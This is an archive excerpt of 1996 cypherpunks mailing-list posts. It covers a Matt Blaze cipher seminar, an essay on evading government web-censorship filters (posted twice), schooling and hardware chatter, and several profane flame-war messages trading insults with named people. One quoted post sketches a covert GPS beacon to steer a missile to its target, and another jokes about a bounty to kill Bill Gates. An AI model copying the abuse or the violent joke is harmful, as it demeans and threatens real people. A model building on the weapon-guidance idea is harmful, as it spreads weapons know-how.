]iQCVAwUBMkzuH75OPIRbv66xAQHSmQQAqw0F/lIsCcQwOpiSQDx4hMqOVVUVXbyR >> ]3RMWY20ECE0TpAtJ6hkAiqphsWUSBqiFj2kGHMh+jHSHXIMPF+m1qtwVbgutJC7B >> ]8VYWj0VP+bGu5dEUisLrVHDNj5ucEIDyK2GnqObiCiKARFUbOuZnMQOp9TDJqibh >> ]2Wqa5+h8R7g= >> ]=/M2U >> ]-----END PGP SIGNATURE----- >> ] >> ] Datacomms Technologies web authoring and data security >> ] Paul Bradley, Paul at fatmans.demon.co.uk >> ] Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org >> ] Http://www.cryptography.home.ml.org/ >> ] Email for PGP public key, ID: 5BBFAEB1 >> ] "Don`t forget to mount a scratch monkey" >> >Fuckhead. From shamrock at netcom.com Sun Sep 29 22:09:07 1996 From: shamrock at netcom.com (Lucky Green) Date: Mon, 30 Sep 1996 13:09:07 +0800 Subject: GPS and other Dual-use technologies In-Reply-To: Message-ID: On Sun, 29 Sep 1996, Steve Schear wrote: > Craft are free to use any navigational technology, but must be autonomous > from launch to delivery. To aid navigation I was considering the design of > a substitute differential GPS beacon functionally interchangable with those > offered by the USCG. My device would work on a different frequency, > possibly using very wideband direct sequence spread spectrum (for low > probability of intercept/detection) and be actuated by the missile as it > neared the target in order to refine its position. While in St. Louis on business, I talked with two guys writing the operations manual for a new Navy missile built by a local defense contractor. The missile was using GPS for targeting. --Lucky From geeman at best.com Sun Sep 29 22:15:05 1996 From: geeman at best.com (geeman at best.com) Date: Mon, 30 Sep 1996 13:15:05 +0800 Subject: Does any body know anything about this? Message-ID: <01BBAE45.DD7DB480@geeman.vip.best.com> Snakeoil? Matt Blaze? Where _you_ been, cowboy? ---------- From: John Anonymous MacDonald[SMTP:nobody at cypherpunks.ca] Sent: Sunday, September 29, 1996 2:38 PM To: cypherpunks at toad.com Subject: Does any body know anything about this? Is this just more snakeoil or is this real? <<<<<<<< FORWARDED MESSAGE >>>>>>>> From: Ross Anderson Date: Fri, 20 Sep 1996 09:05:28 +0100 Subject: Seminar in Cryptology and Computer Security *** *** *** *** *** University of Cambridge Computer Laboratory EXTRA SEMINAR SPEAKER: Matt Blaze AT&T Research DATE: Monday 23rd September 1996 at 11.30 am PLACE: Room TP4, Computer Laboratory TITLE: SYMMETRIC-KEY CIPHERS BASED ON HARD PROBLEMS A useful principle in cipher design is to reduce or at least relate closely the cryptanalysis of the cipher to some long-studied problem that is believed to be difficult. Most public-key ciphers follow this principle fairly closely (e.g., RSA is at least similar to factoring). Modern symmetric-key ciphers, on the other hand, can rarely be reduced in this way and so are frequently designed specifically to resist the various known cryptanalytic attacks. In this informal talk, we examine a simple cipher primitive, based on Feistel networks, for which recovery of its internal state given its inputs and outputs is NP-complete. We outline simple and efficient block- and stream- cipher constructions based on this primitive. * * * The regular Michaelmas term seminar series will resume on the 8th October with a series of talks on Tuesday afternoons at 4.15 PM in room TP4, Computer Laboratory, Pembroke Street, Cambridge. A list of speakers will be circulated shortly. * * * From stewarts at ix.netcom.com Sun Sep 29 22:30:12 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 30 Sep 1996 13:30:12 +0800 Subject: Tools for Rendering Censorship Firewalls Ineffective Message-ID: <199609300259.TAA04617@dfw-ix8.ix.netcom.com> I've been trying to categorize the web censorship techniques available to governments, such as Singapore and China's Firewall Curtains, Germany's ISP Threats, etc. The objective is to make information widely and conveniently available to subjects of the censoring country by building tools that will provide multiple paths to data that are easy to find and hard to block because they're too pervasive. I'm assuming that email is difficult to block, in-country public websites are blockable (through business licenses, lawsuits, rubber-hoses, or confiscation), in-country private websites are difficult to block but not very relevant, authors can afford and post to foreign web sites without effective blocking, and that the real "threat" to the government is foreign websites making banned information conveniently available to its subjects. I'm also assuming that the government can use humans to discover a moderate quantity of banned info, but that blocking will mostly be done by bots rather than human readers. In particular, I'm ignoring the approach of in-country hidden websites, since it's too vulnerable in some countries, and focussing on the web rather than email because it's mass-market and easier to use, and email is harder to stop, especially given crypto and remailers. Notation: "Attack" is the Censors trying to stop data; "defend" and "evade" are the Good Guys trying to not get censored. The obvious techniques I can see include 1) Filter on IP address (e.g. German attack on XS4ALL) 2) Filter on DNS Name 3) Filter on Patterns in URL 4) Filter on Patterns in PUT/GET Requests 5) Filter on Patterns in Response. 6) Traffic Analysis on reading patterns Defenses - The most important defenses to these attacks depend on ubiquity and volume - they can block one or two of anything, they might be able to block a thousand, and it's not possible to block millions of things everywhere. So building bridges between systems and increasing multiplicity is a win. 1) It's easy to evade the crude version of this attack - use rolling IP addresses, and use DNS to publish the new ones. For the German model, where the government has to tell the ISPs who to block, this wins. They can counter by blocking your whole IP network, not just a single machine, which you can counter by hopping IP networks as well as hosts, though that's more trouble (and blocking routes is probably easier than blocking hosts, since you do it at the routers, and harder to get people to turn back on.) They can also enforce boycotts on the ISP, as they did with XS4ALL - blocking most of the traffic to a site can affect its other traffic enough to be economically annoying. The attackers can counter by also tracking the address with a bot - if you change addresses hourly, they can change blocking addresses hourly, which may workable for somewhere high-tech like Singapore or very focussed like China, but isn't very effective for somewhere porous like Germany that has a system of laws that move at the speed of bureaucracy. A very effective defense against this method is to deploy relay servers, either anonymizers or simple non-anonymizing cgi scripts that take URLs like http://foo.bar.com/cgi-bin/relay.pl/http://banned.site.org/ and fetch and return the real URL (perhaps modifying any URLs in it to connect through the relay.) This works if there are lots of easy-to-find relay servers. An obvious approach would be to package the relay program with Apache or other popular web server, so anybody who didn't bother turning it off would have a relay named "relay.pl"; the attackers can't realistically block everybody who's got one. Another effective defense is to use web servers that gateway to AFS (Andrew File System) or other distributed file systems. This lets /stanford.edu/censored-mirrors/banned.html be accessible from any site supporting AFS, such as http://www.cmu.edu/afs/stanford.edu/censored-mirrors/banned.html This has the great advantage that AFS sites are usually at major universities, which are important enough that lots of people would complain if you blocked them. This works better if there's an easy way to insert things into the AFS tree - volunteers are fine, but if there are servers that can automatically import material it becomes easier, either by copying or by various kinds of indirection. (On the other hand, if you allow automated import, attackers can turn your site into the Child Pornography NarcoTerrorist Bomb Info Mart and ban you...) Do the major web crawlers index AFS? Or do the sites use robots.txt to prevent multiple crawls, e.g. by only allowing searching on the local file systems and not on the remote ones? 2) Filtering on DNS names is an attack that proxy servers can use - the HTTP spec [RFC1945] says that requests to proxies need to send an Absolute URI (method://machine[:port][abs_path]) rather than just the absolute path (/etc.), so the proxy servers can filter on DNS names, defeating the rolling-IP-address defense. Doesn't stop relays. Non-proxy attacks don't have access to this method. However, governments that use full-scale firewalls and not just http proxies can also restrict what DNS queries the National DNS Servers will pass. How to defend against it for non-proxy attackers? One way is to make it easy to find the IP address of a server with banned material - web indexers can find everything, so putting the IP form of the URL in a file that the popular indexers, along with useful keywords, is one way to make sure you get found. Another would be to deploy DNS servers widely (done:-) and maybe form-based interfaces for users that will run Dig or whatever. 3) Filtering on patterns in URLs - as with DNS filters, a proxy server run by an attacker can block access based on patterns in the URL, such as relay.pl. This makes it tougher to use relays as a defense, because they either need to have different names on different machines (harder for users to find and for administrators to implement without having to pay attention), or else to not need a name (either modify the protocols or at least the servers so that http://foo.bar.com/http://banned.site.org/stuff.html gets handled properly.) The latter is doable, but probably requires more administrator support? Pattern matching on URLs can make it easier to attack AFS - you don't need to kill the whole AFS tree, just the banned parts. Pattern matching on URLs already starts to have heavy volume issues - can a proxy server take the extra time to search an ever-larger banned list on every web hit? Having used overloaded proxy servers at work (:-), I'd expect the population to start acting like disgruntled postal workers if the mandatory national firewall is underpowered. On the other hand, I suppose a government could partially solve scale problems by requiring a license fee for use of the proxy server; a few bucks per user could pay for increasing numbers of servers as well as tracking who's reading what. 4) Filter on Patterns in PUT/GET Requests As a defense against blocking URLs by patterns, defenders can send requests as message-body in PUT/GET requests; this is also useful for submitting banned material to cooperative sites. Attackers can filter on this material, though they can't easily filter out SSL or S-HTTP requests by content, depending on how much the protocols pass material end-to-end rather than link-by-link where the proxy can see it. 5) Filter on Patterns in Responses. Similarly, attackers could just grep for banned material in HTTP responses, though SSL/S-HTTP both interfere with this. Defenders can also structure banned writing in ways that don't trigger patterns easily (e.g. don't refer to Lee Kwan Yew, just refer to That Bum or Mr. Big, etc.) Filtering on picture content is obviously difficult, so including text in graphics can help prevent attacks. In general, I'd expect filtering attacks to be extremely susceptible to volume. On the other hand, attackers don't have to filter in real-time; they could scan material as a background activity, and go arrest the people who have received contraband after the fact, or just block their National Firewall Passports if they're reading too much. In general, this attack is probably more useful for overall study of what their subjects are reading than for real-time. 6) Traffic Analysis - who's reading what? Where? Who's reading a lot of contraband? What's popular foreign material? Which of the attackers' subjects are possible fellow travellers, based on what they're reading? This kind of material is useful for marketing as well as for identifying malcontents - businesses aren't always pro-privacy either, though they want their own secrets kept secret. Many of the attacks above can work as after-the-fact analysis more effectively than they can as real-time blocking, and volume is less of a problem for crunching a sample of firewall logs than for active blocking; this may be the hardest attack to counter, though it's repression rather than censorship. If you can't police everybody, you can at least encourage the policeman in everybody's head. +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ What other kinds of attacks are there? What other defenses? What kinds of holes are there in these defenses? # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From Adamsc at io-online.com Sun Sep 29 22:30:46 1996 From: Adamsc at io-online.com (Adamsc) Date: Mon, 30 Sep 1996 13:30:46 +0800 Subject: Public Schools Message-ID: <19960930035040656.AAA252@IO-ONLINE.COM> On Sun, 29 Sep 96 07:55:34 +0000, attila wrote: > "That's our advantage at Microsoft; > we set the standards and we can change them." > --- Karen Hargrove, Microsoft > (quoted in the Feb 1993 Unix Review editorial) > > and, if this is not the gawd-awful truth, I must have just got > off the bus... typical, typical MS arrogance. > a toast! a toast to their early demise! Now there'd be an almost acceptable use of AP! I bet Team OS/2 alone would contribute enough to paste billg. Not to mention what IBM or Sun or Apple or Lotus or Borland or [company that got screwed] would do. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" "That's our advantage at Microsoft; we set the standards and we can change them." --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial) From ponder at freenet.tlh.fl.us Sun Sep 29 22:32:38 1996 From: ponder at freenet.tlh.fl.us (P. J. Ponder) Date: Mon, 30 Sep 1996 13:32:38 +0800 Subject: The ever-vigilant John Anon Message-ID: >Date: Sun, 29 Sep 1996 14:38:01 -0700 >From: John Anonymous MacDonald >To: cypherpunks at toad.com >Subject: Does any body know anything about this? > >Is this just more snakeoil or is this real? This is quite real, and was posted on the CCC list a while ago. It turns out the Isaac Newton Institute for Mathematical Sciences (Cambridge, UK) has been having a regular series of seminars on crypto and papers from a distinguished group of presenters. Several of the agenda notices, etc., have been posted here from time to time, hidden in the usual spew. Look for the proceedings to be published by Springer Verlag. Do a web search on 'Information Hiding' or 'Turbo Codes' or just go look at: http://www.cl.cam.ac.uk/users/rja14/ihws.html Snake oil, indeed. > ><<<<<<<< FORWARDED MESSAGE >>>>>>>> >From: Ross Anderson >Date: Fri, 20 Sep 1996 09:05:28 +0100 >Subject: Seminar in Cryptology and Computer Security > > *** *** *** *** *** From Adamsc at io-online.com Sun Sep 29 22:39:25 1996 From: Adamsc at io-online.com (Adamsc) Date: Mon, 30 Sep 1996 13:39:25 +0800 Subject: The Petaflops Boondoggle Computer (was PET_ard) Message-ID: <19960930035040656.AAC252@IO-ONLINE.COM> On Sun, 29 Sep 1996 12:16:27 -0800, Timothy C. May wrote: >Symmetric multiprocessing is available, but it's often much less hassle to >have a single CPU running at 200 MHz than to try games with multiple >processors (which means more PCB real estate, more sockets, more of other >things). As far as SMP goes, it's actually not all that expensive. People in the linux-smp list have reported differences of as little as $50 for a uniprocessor vs. dual pentium system. Of course, every so often we'll get a message about a $30,000 system that can handle up to 64 Pentium Pros! # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" "That's our advantage at Microsoft; we set the standards and we can change them." --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial) From stewarts at ix.netcom.com Sun Sep 29 22:45:11 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 30 Sep 1996 13:45:11 +0800 Subject: Tools for Rendering Censorship Firewalls Ineffective Message-ID: <199609300305.UAA03732@netcomsv.netcom.com> I've been trying to categorize the web censorship techniques available to governments, such as Singapore and China's Firewall Curtains, Germany's ISP Threats, etc. The objective is to make information widely and conveniently available to subjects of the censoring country by building tools that will provide multiple paths to data that are easy to find and hard to block because they're too pervasive. I'm assuming that email is difficult to block, in-country public websites are blockable (through business licenses, lawsuits, rubber-hoses, or confiscation), in-country private websites are difficult to block but not very relevant, authors can afford and post to foreign web sites without effective blocking, and that the real "threat" to the government is foreign websites making banned information conveniently available to its subjects. I'm also assuming that the government can use humans to discover a moderate quantity of banned info, but that blocking will mostly be done by bots rather than human readers. In particular, I'm ignoring the approach of in-country hidden websites, since it's too vulnerable in some countries, and focussing on the web rather than email because it's mass-market and easier to use, and email is harder to stop, especially given crypto and remailers. Notation: "Attack" is the Censors trying to stop data; "defend" and "evade" are the Good Guys trying to not get censored. The obvious techniques I can see include 1) Filter on IP address (e.g. German attack on XS4ALL) 2) Filter on DNS Name 3) Filter on Patterns in URL 4) Filter on Patterns in PUT/GET Requests 5) Filter on Patterns in Response. 6) Traffic Analysis on reading patterns Defenses - The most important defenses to these attacks depend on ubiquity and volume - they can block one or two of anything, they might be able to block a thousand, and it's not possible to block millions of things everywhere. So building bridges between systems and increasing multiplicity is a win. 1) It's easy to evade the crude version of this attack - use rolling IP addresses, and use DNS to publish the new ones. For the German model, where the government has to tell the ISPs who to block, this wins. They can counter by blocking your whole IP network, not just a single machine, which you can counter by hopping IP networks as well as hosts, though that's more trouble (and blocking routes is probably easier than blocking hosts, since you do it at the routers, and harder to get people to turn back on.) They can also enforce boycotts on the ISP, as they did with XS4ALL - blocking most of the traffic to a site can affect its other traffic enough to be economically annoying. The attackers can counter by also tracking the address with a bot - if you change addresses hourly, they can change blocking addresses hourly, which may workable for somewhere high-tech like Singapore or very focussed like China, but isn't very effective for somewhere porous like Germany that has a system of laws that move at the speed of bureaucracy. A very effective defense against this method is to deploy relay servers, either anonymizers or simple non-anonymizing cgi scripts that take URLs like http://foo.bar.com/cgi-bin/relay.pl/http://banned.site.org/ and fetch and return the real URL (perhaps modifying any URLs in it to connect through the relay.) This works if there are lots of easy-to-find relay servers. An obvious approach would be to package the relay program with Apache or other popular web server, so anybody who didn't bother turning it off would have a relay named "relay.pl"; the attackers can't realistically block everybody who's got one. Another effective defense is to use web servers that gateway to AFS (Andrew File System) or other distributed file systems. This lets /stanford.edu/censored-mirrors/banned.html be accessible from any site supporting AFS, such as http://www.cmu.edu/afs/stanford.edu/censored-mirrors/banned.html This has the great advantage that AFS sites are usually at major universities, which are important enough that lots of people would complain if you blocked them. This works better if there's an easy way to insert things into the AFS tree - volunteers are fine, but if there are servers that can automatically import material it becomes easier, either by copying or by various kinds of indirection. (On the other hand, if you allow automated import, attackers can turn your site into the Child Pornography NarcoTerrorist Bomb Info Mart and ban you...) Do the major web crawlers index AFS? Or do the sites use robots.txt to prevent multiple crawls, e.g. by only allowing searching on the local file systems and not on the remote ones? 2) Filtering on DNS names is an attack that proxy servers can use - the HTTP spec [RFC1945] says that requests to proxies need to send an Absolute URI (method://machine[:port][abs_path]) rather than just the absolute path (/etc.), so the proxy servers can filter on DNS names, defeating the rolling-IP-address defense. Doesn't stop relays. Non-proxy attacks don't have access to this method. However, governments that use full-scale firewalls and not just http proxies can also restrict what DNS queries the National DNS Servers will pass. How to defend against it for non-proxy attackers? One way is to make it easy to find the IP address of a server with banned material - web indexers can find everything, so putting the IP form of the URL in a file that the popular indexers, along with useful keywords, is one way to make sure you get found. Another would be to deploy DNS servers widely (done:-) and maybe form-based interfaces for users that will run Dig or whatever. 3) Filtering on patterns in URLs - as with DNS filters, a proxy server run by an attacker can block access based on patterns in the URL, such as relay.pl. This makes it tougher to use relays as a defense, because they either need to have different names on different machines (harder for users to find and for administrators to implement without having to pay attention), or else to not need a name (either modify the protocols or at least the servers so that http://foo.bar.com/http://banned.site.org/stuff.html gets handled properly.) The latter is doable, but probably requires more administrator support? Pattern matching on URLs can make it easier to attack AFS - you don't need to kill the whole AFS tree, just the banned parts. Pattern matching on URLs already starts to have heavy volume issues - can a proxy server take the extra time to search an ever-larger banned list on every web hit? Having used overloaded proxy servers at work (:-), I'd expect the population to start acting like disgruntled postal workers if the mandatory national firewall is underpowered. On the other hand, I suppose a government could partially solve scale problems by requiring a license fee for use of the proxy server; a few bucks per user could pay for increasing numbers of servers as well as tracking who's reading what. 4) Filter on Patterns in PUT/GET Requests As a defense against blocking URLs by patterns, defenders can send requests as message-body in PUT/GET requests; this is also useful for submitting banned material to cooperative sites. Attackers can filter on this material, though they can't easily filter out SSL or S-HTTP requests by content, depending on how much the protocols pass material end-to-end rather than link-by-link where the proxy can see it. 5) Filter on Patterns in Responses. Similarly, attackers could just grep for banned material in HTTP responses, though SSL/S-HTTP both interfere with this. Defenders can also structure banned writing in ways that don't trigger patterns easily (e.g. don't refer to Lee Kwan Yew, just refer to That Bum or Mr. Big, etc.) Filtering on picture content is obviously difficult, so including text in graphics can help prevent attacks. In general, I'd expect filtering attacks to be extremely susceptible to volume. On the other hand, attackers don't have to filter in real-time; they could scan material as a background activity, and go arrest the people who have received contraband after the fact, or just block their National Firewall Passports if they're reading too much. In general, this attack is probably more useful for overall study of what their subjects are reading than for real-time. 6) Traffic Analysis - who's reading what? Where? Who's reading a lot of contraband? What's popular foreign material? Which of the attackers' subjects are possible fellow travellers, based on what they're reading? This kind of material is useful for marketing as well as for identifying malcontents - businesses aren't always pro-privacy either, though they want their own secrets kept secret. Many of the attacks above can work as after-the-fact analysis more effectively than they can as real-time blocking, and volume is less of a problem for crunching a sample of firewall logs than for active blocking; this may be the hardest attack to counter, though it's repression rather than censorship. If you can't police everybody, you can at least encourage the policeman in everybody's head. +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ What other kinds of attacks are there? What other defenses? What kinds of holes are there in these defenses? # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From dfloyd at io.com Sun Sep 29 22:54:10 1996 From: dfloyd at io.com (Douglas R. Floyd) Date: Mon, 30 Sep 1996 13:54:10 +0800 Subject: Does any body know anything about this? In-Reply-To: <199609292138.OAA27616@abraham.cs.berkeley.edu> Message-ID: <199609300328.WAA21279@bermuda.io.com> > > Is this just more snakeoil or is this real? [Deleted -- Matt Blaze's seminar] Matt Blaze isn't a snake oil type. He from what I have seen is one of the "good guys". I think, he is the maker of S/KEY, IIRC. From varange at crl.com Sun Sep 29 23:02:13 1996 From: varange at crl.com (Troy Varange) Date: Mon, 30 Sep 1996 14:02:13 +0800 Subject: [SPAM] More "fuckhead" fan mail from Timmy "peteur" May In-Reply-To: Message-ID: <199609300332.AA09870@crl12.crl.com> > berserk > Timmy May has gone . Has he been eating speed? > bananas > > >From: Troy Varange > >Message-Id: <199609300138.AA08482 at crl12.crl.com> > >Subject: Re: [SPAM] More fan mail from Timmy "peteur" May > >To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) > >Date: Sun, 29 Sep 1996 18:38:05 -0700 (PDT) > >In-Reply-To: from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 07:14:50 pm > >X-Mailer: ELM [version 2.4 PL23] > >Mime-Version: 1.0 > >Content-Type: text/plain; charset=US-ASCII > >Content-Transfer-Encoding: 7bit > >Content-Length: 3442 > > > >> > >> What has Timmy been smoking? > >> > >> ]From paul at fatmans.demon.co.uk Sun Sep 29 19:03:40 1996 > >> ]Received: by bwalk.dm.com (1.65/waf) > >> ] via UUCP; Sun, 29 Sep 96 19:14:06 EDT > >> ] for dlv > >> ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; > >> ] id AA25790 for dlv at bwalk.dm.com; Sun, 29 Sep 96 19:03:40 -0400 > >> ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ac16129; > >> ] 29 Sep 96 15:59 BST > >> ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net > >> ] id aa09441; 29 Sep 96 15:54 BST > >> ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP > >> ] id AA843903697 ; Sat, 28 Sep 96 09:41:37 +0000 > >> ]Comments: Authenticated sender is > >> ]From: paul at fatmans.demon.co.uk > >> ]To: "Dr.Dimitri Vulis KOTM" > >> ]Date: Sat, 28 Sep 1996 09:21:37 +0000 > >> ]Mime-Version: 1.0 > >> ]Content-Type: text/plain; charset=US-ASCII > >> ]Content-Transfer-Encoding: 7BIT > >> ]Subject: Re: Possible subs attack???? > >> ]Priority: normal > >> ]X-Pm-Encryptor: JN-PGP-P, 4 > >> ]X-Mailer: Pegasus Mail for Windows (v2.31) > >> ]Message-Id: <844008901.9441.0 at fatmans.demon.co.uk> > >> ] > >> ]-----BEGIN PGP SIGNED MESSAGE----- > >> ] > >> ] > >> ]> The lying sack of shit Timmy May writes: > >> ] > >> ]> The lying sack of shit Timmy May lies again, as usual. > >> ] > >> ]Fuck you, > >> ] > >> ]I am not Tim May, Check out the return path if you don`t believe me, > >> ]if you still don`t here`s my PGP public key signed by the EFF, they > >> ]don`t sign keys here and there without checking ID`s... > >> ] > >> ]Type Bits/KeyID Date User ID > >> ]pub 1024/5BBFAEB1 1996/07/30 Paul Bradley > >> ] > >> ]- -----BEGIN PGP PUBLIC KEY BLOCK----- > >> ]Version: 2.6.3ia > >> ] > >> ]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 > >> ]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 > >> ]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR > >> ]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy > >> ]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP > >> ]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b > >> ]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k > >> ]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ > >> ]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 > >> ]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 > >> ]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp > >> ]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW > >> ]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi > >> ]mUqFH41Z7NkyO8ZFdi5GGX0= > >> ]=CMZA > >> ]- -----END PGP PUBLIC KEY BLOCK----- > >> ] > >> ] > >> ] > >> ]-----BEGIN PGP SIGNATURE----- > >> ]Version: 2.6.3ia > >> ]Charset: cp850 > >> ] > >> ]iQCVAwUBMkzuH75OPIRbv66xAQHSmQQAqw0F/lIsCcQwOpiSQDx4hMqOVVUVXbyR > >> ]3RMWY20ECE0TpAtJ6hkAiqphsWUSBqiFj2kGHMh+jHSHXIMPF+m1qtwVbgutJC7B > >> ]8VYWj0VP+bGu5dEUisLrVHDNj5ucEIDyK2GnqObiCiKARFUbOuZnMQOp9TDJqibh > >> ]2Wqa5+h8R7g= > >> ]=/M2U > >> ]-----END PGP SIGNATURE----- > >> ] > >> ] Datacomms Technologies web authoring and data security > >> ] Paul Bradley, Paul at fatmans.demon.co.uk > >> ] Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org > >> ] Http://www.cryptography.home.ml.org/ > >> ] Email for PGP public key, ID: 5BBFAEB1 > >> ] "Don`t forget to mount a scratch monkey" > >> > >Fuckhead. > Fuckhead. We know your behind Vulis, Cock-sucker From Adamsc at io-online.com Sun Sep 29 23:03:22 1996 From: Adamsc at io-online.com (Adamsc) Date: Mon, 30 Sep 1996 14:03:22 +0800 Subject: [RANT] Re: Workers, Public Schools, Tradesmen, and Justice Message-ID: <19960930035040656.AAB252@IO-ONLINE.COM> On Sun, 29 Sep 1996 13:26:08 -0400 (EDT), Rabid Wombat wrote: >> The old way was that your HS provided what the mythical average person needed >> to go about life. College was for the more "complex" careers. >Perhaps "high school" should end at age 16, with two years of publicly >funded "junior college" or "technical school" available to those who >select one or the other, and qualify. This would bring an adult-level >decision earlier in life, and students would need to start thinking about >which path to chose at about 14. Perhaps this would allow reality to set >in at an earlier age. A high school diploma has become meaningless anyway >- it is viewed as a "right." How about a real simple rule: if you don't pass a standardized test (Call it the SATs w/800 of 1600 minimum) you repeat the grade - no maximum age! Might end some of those "easy A" classes I took. >This wouldn't leave anyone condemned to a life of menial labor for a >decision made at age 16 - there are plenty of successful people who have >obtained a G.E.D. later in life, and then gone on to college. It would, >however, give some measure of responsibility to the near-adult. Yeah. I'd still say that you'd want to make it pretty easy to switch over - I've known a few people who were massively flip-flopping. Also, some kids may have hard times (parents divorce, etc) that might screw up their judgement for awhile. . . >fiance did drop out of high school at age 16 and started college, with her >parent's blessing. All her high school guidence counselor could come up >with was "But she'll miss her prom"! That seemed to be the general focus last year... "We may be idiots but we have school spirit!" In CA, isn't there the option of taking CHSPE (sp?) that is like a GED but instead of sending the "I don't want this" message is more like "I don't want to waste my time"? # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" "That's our advantage at Microsoft; we set the standards and we can change them." --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial) From dlv at bwalk.dm.com Sun Sep 29 23:09:14 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 30 Sep 1996 14:09:14 +0800 Subject: [SPAM] Continuing "fuckhead" fan mail from Timmy "peteur" May In-Reply-To: <199609300332.AA09870@crl12.crl.com> Message-ID: Timmy May has no life. >From: Troy Varange >Message-Id: <199609300332.AA09870 at crl12.crl.com> >Subject: Re: [SPAM] More "fuckhead" fan mail from Timmy "peteur" May >To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) >Date: Sun, 29 Sep 1996 20:32:58 -0700 (PDT) >In-Reply-To: from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 09:45:41 pm >X-Mailer: ELM [version 2.4 PL23] >Mime-Version: 1.0 >Content-Type: text/plain; charset=US-ASCII >Content-Transfer-Encoding: 7bit >Content-Length: 4378 > >> berserk >> Timmy May has gone . Has he been eating speed? >> bananas >> >> >From: Troy Varange >> >Message-Id: <199609300138.AA08482 at crl12.crl.com> >> >Subject: Re: [SPAM] More fan mail from Timmy "peteur" May >> >To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) >> >Date: Sun, 29 Sep 1996 18:38:05 -0700 (PDT) >> >In-Reply-To: from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 07:14:50 pm >> >X-Mailer: ELM [version 2.4 PL23] >> >Mime-Version: 1.0 >> >Content-Type: text/plain; charset=US-ASCII >> >Content-Transfer-Encoding: 7bit >> >Content-Length: 3442 >> > >> >> >> >> What has Timmy been smoking? >> >> >> >> ]From paul at fatmans.demon.co.uk Sun Sep 29 19:03:40 1996 >> >> ]Received: by bwalk.dm.com (1.65/waf) >> >> ] via UUCP; Sun, 29 Sep 96 19:14:06 EDT >> >> ] for dlv >> >> ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; >> >> ] id AA25790 for dlv at bwalk.dm.com; Sun, 29 Sep 96 19:03:40 -0400 >> >> ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ac16129; >> >> ] 29 Sep 96 15:59 BST >> >> ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net >> >> ] id aa09441; 29 Sep 96 15:54 BST >> >> ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP >> >> ] id AA843903697 ; Sat, 28 Sep 96 09:41:37 +0000 >> >> ]Comments: Authenticated sender is >> >> ]From: paul at fatmans.demon.co.uk >> >> ]To: "Dr.Dimitri Vulis KOTM" >> >> ]Date: Sat, 28 Sep 1996 09:21:37 +0000 >> >> ]Mime-Version: 1.0 >> >> ]Content-Type: text/plain; charset=US-ASCII >> >> ]Content-Transfer-Encoding: 7BIT >> >> ]Subject: Re: Possible subs attack???? >> >> ]Priority: normal >> >> ]X-Pm-Encryptor: JN-PGP-P, 4 >> >> ]X-Mailer: Pegasus Mail for Windows (v2.31) >> >> ]Message-Id: <844008901.9441.0 at fatmans.demon.co.uk> >> >> ] >> >> ]-----BEGIN PGP SIGNED MESSAGE----- >> >> ] >> >> ] >> >> ]> The lying sack of shit Timmy May writes: >> >> ] >> >> ]> The lying sack of shit Timmy May lies again, as usual. >> >> ] >> >> ]Fuck you, >> >> ] >> >> ]I am not Tim May, Check out the return 